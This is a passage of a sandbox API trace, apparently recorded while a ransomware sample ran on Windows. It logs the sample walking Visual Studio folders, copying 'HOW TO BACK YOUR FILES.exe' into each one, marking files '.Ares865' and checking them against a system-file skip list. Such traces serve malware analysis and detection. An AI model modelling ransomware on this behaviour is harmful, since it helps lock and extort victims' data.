lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0128.636] lstrcmpiW (lpString1="VSTA", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.636] lstrcmpiW (lpString1="VSTA", lpString2="aoldtz.exe") returned 1 [0128.636] lstrcpyW (in: lpString1=0x2cce47a, lpString2="VSTA" | out: lpString1="VSTA") returned="VSTA" [0128.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0128.636] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 0 [0128.636] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.636] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0128.636] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA" [0128.637] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA" [0128.637] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.637] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.638] GetLastError () returned 0x0 [0128.638] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.638] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.638] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.638] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.638] lstrcpyW (in: lpString1=0x2cce484, lpString2="ItemTemplates" | out: lpString1="ItemTemplates") returned="ItemTemplates" [0128.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321118 [0128.638] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.638] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ItemTemplates", cAlternateFileName="ITEMTE~1")) returned 0 [0128.638] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.639] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0128.639] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates" [0128.639] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates" [0128.639] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.639] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.640] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.640] GetLastError () returned 0x0 [0128.640] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.640] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.640] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.640] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.641] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="CSharp" | out: lpString1="CSharp") returned="CSharp" [0128.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xae) returned 0x2e8890 [0128.641] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.641] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5256ca60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.641] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.641] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisualBasic", cAlternateFileName="VISUAL~1")) returned 1 [0128.641] lstrcmpiW (lpString1="VisualBasic", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.641] lstrcmpiW (lpString1="VisualBasic", lpString2="aoldtz.exe") returned 1 [0128.641] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="VisualBasic" | out: lpString1="VisualBasic") returned="VisualBasic" [0128.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0128.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x324fc8 [0128.641] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0128.641] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisualBasic", cAlternateFileName="VISUAL~1")) returned 0 [0128.641] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.641] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0128.641] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic" [0128.642] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic" [0128.642] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.642] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.643] GetLastError () returned 0x0 [0128.643] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.643] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.643] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.643] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.643] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1033" | out: lpString1="1033") returned="1033" [0128.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0128.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc2) returned 0x334fc8 [0128.643] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0128.643] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5256ca60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.643] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.643] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5256ca60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0128.644] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.644] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0128.644] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033" [0128.644] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033" [0128.644] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.644] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.645] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.645] GetLastError () returned 0x0 [0128.646] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.646] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x526c36c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x526c36c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.646] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.646] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.646] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="AppConfigurationInternal.zip.Ares865" | out: lpString1="AppConfigurationInternal.zip.Ares865") returned="AppConfigurationInternal.zip.Ares865" [0128.646] lstrlenW (lpString="AppConfigurationInternal.zip.Ares865") returned 36 [0128.646] lstrlenW (lpString="Ares865") returned 7 [0128.646] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.646] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x525dee80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x790, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AssemblyInfoInternal.zip.Ares865", cAlternateFileName="ASSEMB~1.ARE")) returned 1 [0128.646] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.646] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.646] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="AssemblyInfoInternal.zip.Ares865" | out: lpString1="AssemblyInfoInternal.zip.Ares865") returned="AssemblyInfoInternal.zip.Ares865" [0128.647] lstrlenW (lpString="AssemblyInfoInternal.zip.Ares865") returned 32 [0128.647] lstrlenW (lpString="Ares865") returned 7 [0128.647] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.647] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x525dee80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x550, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Class.zip.Ares865", cAlternateFileName="CLASSZ~1.ARE")) returned 1 [0128.647] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.647] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.647] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="Class.zip.Ares865" | out: lpString1="Class.zip.Ares865") returned="Class.zip.Ares865" [0128.647] lstrlenW (lpString="Class.zip.Ares865") returned 17 [0128.647] lstrlenW (lpString="Ares865") returned 7 [0128.647] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.647] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10fa9fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x525dee80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dataset.zip.Ares865", cAlternateFileName="DATASE~1.ARE")) returned 1 [0128.647] lstrcmpiW (lpString1="Dataset.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.647] lstrcmpiW (lpString1="Dataset.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.647] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="Dataset.zip.Ares865" | out: lpString1="Dataset.zip.Ares865") returned="Dataset.zip.Ares865" [0128.647] lstrlenW (lpString="Dataset.zip.Ares865") returned 19 [0128.648] lstrlenW (lpString="Ares865") returned 7 [0128.648] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.648] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10fa9fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52604fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dialog.zip.Ares865", cAlternateFileName="DIALOG~1.ARE")) returned 1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2=".") returned 1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="..") returned 1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="windows") returned -1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="bootmgr") returned 1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="temp") returned -1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="boot") returned 1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="ids.txt") returned -1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="perflogs") returned -1 [0128.648] lstrcmpiW (lpString1="Dialog.zip.Ares865", lpString2="MSBuild") returned -1 [0128.648] lstrlenW (lpString="Dialog.zip.Ares865") returned 18 [0128.648] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip.Ares865") returned 116 [0128.648] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="Dialog.zip.Ares865" | out: lpString1="Dialog.zip.Ares865") returned="Dialog.zip.Ares865" [0128.648] lstrlenW (lpString="Dialog.zip.Ares865") returned 18 [0128.649] lstrlenW (lpString="Ares865") returned 7 [0128.649] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.649] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10ff6270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52604fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x660, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EmptyDatabase.zip.Ares865", cAlternateFileName="EMPTYD~1.ARE")) returned 1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2=".") returned 1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="..") returned 1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="windows") returned -1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="bootmgr") returned 1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="temp") returned -1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="boot") returned 1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="ids.txt") returned -1 [0128.649] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.649] 